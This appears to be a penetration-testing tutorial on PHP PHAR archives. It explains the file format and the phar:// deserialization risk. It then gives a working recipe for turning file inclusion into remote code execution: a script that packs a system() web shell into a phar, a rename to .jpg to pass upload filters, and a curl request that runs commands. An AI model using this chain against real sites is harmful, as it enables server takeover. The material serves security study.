PHAR

The PHAR file type is a PHP Archive format designed to package an entire PHP application or library into a single distributable file. Similar in concept to Java's JAR or Python's PEX, a PHAR bundles PHP scripts, metadata, and other resources in a single archive that can be executed directly by the PHP interpreter. This structure simplifies deployment by allowing developers to distribute one file instead of multiple dependencies; individual entries can optionally be compressed with gzip or bzip2 to reduce size.

Internally, a PHAR file starts with a stub script that is executed automatically when the archive is invoked and acts as the entry point; the stub ends with __HALT_COMPILER();, which marks where the binary part begins. After the stub comes the manifest, which describes the archive (file count, alias, an optional serialize()-formatted metadata blob, and one entry per file), followed by the file contents themselves and, usually, a trailing signature (an MD5/SHA hash or OpenSSL signature, ending in the magic bytes GBMB). Because PHAR files can embed executable PHP code, they provide powerful packaging capabilities but also carry inherent security risks. The phar:// stream wrapper recognises an archive by its stub, not by its file extension, so a phar renamed to .jpg is still opened as a phar. Before PHP 8.0, the manifest metadata was passed to unserialize() as soon as the archive was touched through the wrapper, even by a filesystem function such as file_exists() or is_file(), so an attacker who can get a crafted phar onto disk and control a path that reaches the wrapper can trigger PHP object injection; from PHP 8.0 on, metadata is only unserialized by an explicit getMetadata() call.

PHAR WRAPPER

The phar:// wrapper turns a file inclusion (LFI) into RCE when the attacker can upload a file. The script below builds a phar archive whose only entry, shell.txt, holds a web shell. Once the archive is uploaded, an entry inside it is addressed by appending / and the entry name to the archive path (phar://path/to/archive/shell.txt), and including that path executes the shell:

shell.php
<?php
// Phar writes to disk only when phar.readonly=0 (the default is On)
$phar = new Phar('shell.phar');
$phar->startBuffering();
// Single entry: the web shell, addressed later as phar://<archive>/shell.txt
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
// Minimal stub: the phar:// wrapper only needs __HALT_COMPILER(); to recognise the archive
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

# Compile the script into a phar file, then rename it to 'shell.jpg' so it passes an
# extension check on upload (the wrapper ignores the extension)
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

# Upload -> RCE. The '/' between the archive and the entry is URL-encoded (%2F) in case
# the application rejects a literal slash in the parameter; quote the URL so the shell
# does not treat '&' as a command separator
curl 'http://<ip:port>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id'
